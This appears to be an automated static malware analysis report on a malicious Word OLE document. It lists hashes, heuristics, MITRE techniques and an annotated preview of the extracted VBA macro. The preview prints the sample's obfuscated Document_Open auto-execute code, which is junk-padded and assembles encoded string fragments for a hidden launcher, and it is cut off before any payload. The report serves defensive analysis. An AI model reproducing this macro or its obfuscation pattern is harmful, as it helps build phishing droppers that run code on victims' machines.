Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 451acc0126a86638…

MALICIOUS

Office (OLE)

108.4 KB First seen: 2019-01-20
MD5: ba80b3857725565ba8c4811ca5c68fd0 SHA-1: 6ffd0d8f77fb92d02ebaed4735f5bfe0dfa752f1 SHA-256: 451acc0126a8663867cd5c90103a803fb552bf2dfcc47219844c6a529767a61a
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing a Document_Open VBA macro, which is a common technique for executing malicious code as soon as the document is opened. The macro code is heavily obfuscated, and only a truncated preview of it is available, so its exact function cannot be determined from the static view; it is likely designed to download and execute a second-stage payload. The presence of a Document_Open macro and the obfuscated VBA code strongly suggest malicious intent; delivery was likely via a spearphishing attachment.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 111,030 bytes but its declared streams total only 36,254 bytes — 74,776 bytes (67%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). Slack of this size can also be left behind by ordinary edit-and-save cycles, since OLE writers typically do not reclaim freed sectors, so on its own this finding does not prove a hidden payload; for this sample it is corroborating context for the macro findings below rather than the primary indicator.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Contains a Document_Open macro, an auto-execute event handler that Word runs as soon as the document is opened (once macros are enabled), so no further user interaction is needed to start the macro code.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace identifier used by Office file formats; it is a format constant, not a network indicator, and should not be treated as an IoC.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18395 bytes
SHA-256: ee8125bab15ab2180d9427ddfab0012516ac00d653f187a4d301ac7033170d8b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "WOKSzAjrcOJvkM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba. VB_Base = "1Normal.ThisDocument" and
' VB_PredeclaredId = True indicate this is the document's ThisDocument class
' module, which is why its Document_Open handler below fires automatically
' when the file is opened. The random-looking VB_Name is part of the
' obfuscation. No Option Explicit line is present, so every undeclared name
' used below is an implicit Variant (initially Empty).
Private Sub Document_Open()
' Auto-execute entry point: Word runs Document_Open as soon as the document
' is opened (macros permitting), so no further user interaction is needed
' (reported as MITRE T1059.005 / T1566.001 above).
'
' Obfuscation pattern used throughout this module: each If/End If block
' compares names that are never assigned anywhere in the visible listing,
' declares a dynamic array that is never used, and sums more unassigned
' names into a variable that is never read. These blocks are junk padding,
' apparently inserted to frustrate static signatures; none of them affects
' the single real statement near the end of the procedure.
   If CWfXmK = Vpcqw Then

Dim OsaZv()
JWaOzH = OCRkm + LdkMXH + BFqCz + XdhBG
tdKOb = iPMvJ + EpOmb + fDRqiE + YOnjwj

End If
   If WGIik <> GhBXE Then

Dim otomto()
iGbHIB = jzzsuz + mRJXE + HXJFZ + fLditM
mQwuz = cwVIi + cFiCc + OpWiLw + hfWbC

End If
   If szBOIE > 6 Then

Dim ssFvmz()
vlBDW = jDwFi + uufQP
sUzPl = WbNZw + JtaEr

End If
   If diGApA > 8 Then

Dim jEJuMb()
mucMjA = hvqJFY + pcpDhV + ilTIOp + RRSNWi
wzrKw = wjQrk + wqbUrf + EIIJE + KIQdX

End If
   If qaqfws <= PpvUcY Then

Dim rppzbi()
dNqon = ozjFtv + lXAwV
wqPNnj = jSTajv + RMMAr + AtSJp + jWATpt

End If
   If laOACH >= MViFY Then

Dim ijZLAF()
zCXFX = AJfzd + FScrzL + jEoYnE + iwmbI
nQjiCI = rHwjWA + TfGsb

End If
' The only statement with an effect: concatenates the strings returned by
' eleven helper functions and passes the result to arwXTMXIaOE. rUVqV and
' cwbjM are shown in full further down; PbXIs is cut off by the preview
' truncation; the remaining eight helpers and arwXTMXIaOE itself are not in
' the visible preview. The visible fragments are '['-separated character
' runs, so this is presumably an encoded stage handed to a decoder/launcher
' — what it ultimately does cannot be confirmed from this preview alone.
arwXTMXIaOE (rUVqV + cwbjM + PbXIs + OiEEiHMCU + SzLiH + LJuvGwKqwa + EWzvnpsuV + UWdFcLtrZXz + NQhYniRcOH + qMsqXJW + lObvwW)
   If BziXh <= FzYSU Then

Dim VSpci()
spLFVs = AwwVa + JZRBUb

End If
End Sub


Attribute VB_Name = "InrzrBVA"
' Second exported module. No VB_Base attribute is shown for it, so it appears
' to be a standard module; it holds the helper functions whose return values
' Document_Open (in the first module) concatenates.
Function rUVqV()
' Returns one fragment of the obfuscated string that Document_Open passes to
' arwXTMXIaOE. Six string literals, each itself split into short
' concatenated pieces, are assembled in declaration order at the end. The
' interleaved If blocks are the same dead-code padding as in Document_Open:
' unassigned Variants compared and summed, results never read.
' Note: """" in VBA is a literal containing a single double-quote character.
' fragment 1 of 6
JLiJZvbbppO = "`ja ,S[7[LK,@ [p[b[q" + " [?[F:[;u[ [ [D[Vk[" + " %&5 [i-[P" + "[ [#,[8[ [" + "b[X[^[ [y[C[ [ [!["
If dtvvh < oDNNXN Then

Dim ICwPRi()
bHLFsC = wcMuD + jBEjXL + KFcSUH + QpzUiX

End If
   If VhqCfM <> aATUhN Then

Dim wPrFm()
Wftkka = IfsQf + nfWqV + fUibzA + OJqhdY
zWqoGR = EhuID + fZbcZW

End If
   If ISXRz <> RwoKko Then

Dim vMQEF()
VbzLfh = jUkQM + SSFIND + ltIEij + KCbPu

End If
   If YiKGr >= zrzNXz Then

Dim WwpECB()
zcSscz = pjsUV + stkvB

End If
' fragments 2 and 3 of 6
ZOQmKzmTLz = "ho[ [=[^U[ [d[N" + "[7[ [H[A[_ [7" + "[B[H[ [p[t[*"
wZMrn = "[ [?[e[C[ [$[P[N[" + " [U[<[P[ " + """" + "[" + "QK[ [d[\[+[z4[VB" + "[z[C[)[j[x" + "[E[<[7[e[:[ [ `"
If pRJNC Xor OFPhJf Then

Dim QnOHMI()
TqnGCo = szcRbk + iMwKj + MQzdu + awSfkK

End If
   If wziCKN >= VInPh Then

Dim QmbRzf()
jDsJMN = oaRrG + HWfhuz

End If
   If rDtjK <> 18 Then

Dim wRwOr()
EQphkD = amjSwL + ohOIHz + kfmvWG + FQwuLu
JmvoSw = aHlzXP + RDpHs

End If
   If lDlNw = VWmYkR Then

Dim fvSTp()
wKXBz = rUnMHm + iGXjJ + VMLDUM + FusWl

End If
' fragments 4, 5 and 6 of 6
jbRUrKoFi = "[V[#[-[q[F'K" + "^[R[P[X`[h" + "[FSz[6[I[u[8[" + "j[?d[h[\[:[u[^" + """" + "[-[Z" + "[b[/[Q,o[.["
hvcFASt = "N[x[_`[+[I[8[v[Q[" + "D[L[V[T[pK[A[Q[*o[" + "I[g[E[![b[][r " + "[p6[lj[U'[a[b[7['["
jdzui = "3[q[8[g[P[F[U&[" + "b[*[iA[j[b[:[" + "e[5[h[V[ts"
' Return value: the six fragments joined in the order they were built.
rUVqV = JLiJZvbbppO + ZOQmKzmTLz + wZMrn + jbRUrKoFi + hvcFASt + jdzui
   If IJNMuJ > qOnfo Then

Dim vGVqzz()
vqvJi = uHtXzL + puivz + DijDE + KJaYMD

End If
End Function
Function cwbjM()
' Returns the second fragment of the obfuscated string that Document_Open
' passes to arwXTMXIaOE; same construction as rUVqV above. Three string
' literals, each split into short concatenated pieces, are assembled in
' declaration order. The If blocks are dead-code padding (unassigned
' Variants compared and summed, results never read).
' fragment 1 of 3
RTpzOcYlGTB = "[l6[u[bs[ " + "[$[:k[Z[G[w[F,[l[" + "7[8[+[U[ &[v[U" + "[6[L?[d%K[3[P[E" + "o[+[U[/[![p[N&" + "[ [ S[J[)[+[H"
If iUSHK = baafd Then

Dim jvGXVA()
zvUPj = FXpVjr + DwDsFP + KCzva + CoTPVG

End If
   If TmIvMX = IEETf Then

Dim dYRqNW()
vFwmiV = HijID + msUilc + uGTVpP + iXlcAz
hOnWQ = DziYvQ + okEmE

End If
   If XCbdK >= ZvZlhD Then

Dim zWaaPM()
njoEB = XaJuP + wDSOW

End If
   If XHOFi >= 12 Then

Dim EBlEu()
pqisOR = tzwwY + kpREaz + rkfro + XACJRs
mJMGb = DAGDb + pQzZn + LEUzFK + DbuFqq

End If
   If vROEi > PDwqp Then

Dim TIAXZ()
iwlLnq = XiTihU + sSudUq + MoamM + HrBaB
NXXRjd = WGcvV + WtbAN

End If
' fragments 2 and 3 of 3 ("""" is a literal double-quote character)
UlzrjuoWwf = "[*[G[c[$[=[^[ [U" + "[F[P[Xj,[!" + "@[T[6%[>[#`[b[?" + "[H[ [i" + """" + "J[ " + "[f[T[1[5[C]" + "[7[#[a[q[-[\^[n[fo"
wOIaCoHiz = "[l[$['[\[i[7@[;" + "k^[ [J[t[ [+[ " + "[l&[c0[AC@[w+" + "[v[g,[G[ds[/[M[e[T" + "[b[T[3[V[Q[![F[6K[x[" + "h[Z[0[v,[vmo[3"
' Return value: the three fragments joined in the order they were built.
cwbjM = RTpzOcYlGTB + UlzrjuoWwf + wOIaCoHiz
   If lUnLq Or FXijzM Then

Dim MqDWzi()
QtituX = CXiSd + iqamN + PswUp + wzjlG

End If
   If omdwOh Or jsDIEK Then

Dim ihIUl()
ucvZZP = wTzYOJ + scJaCI

End If
End Function
Function PbXIs()
VHGvP = "[p[{[q[/,[z[x" + "[bo[y&r[w[u[I[" + "#[a[x[g[M[6[" +
... (truncated)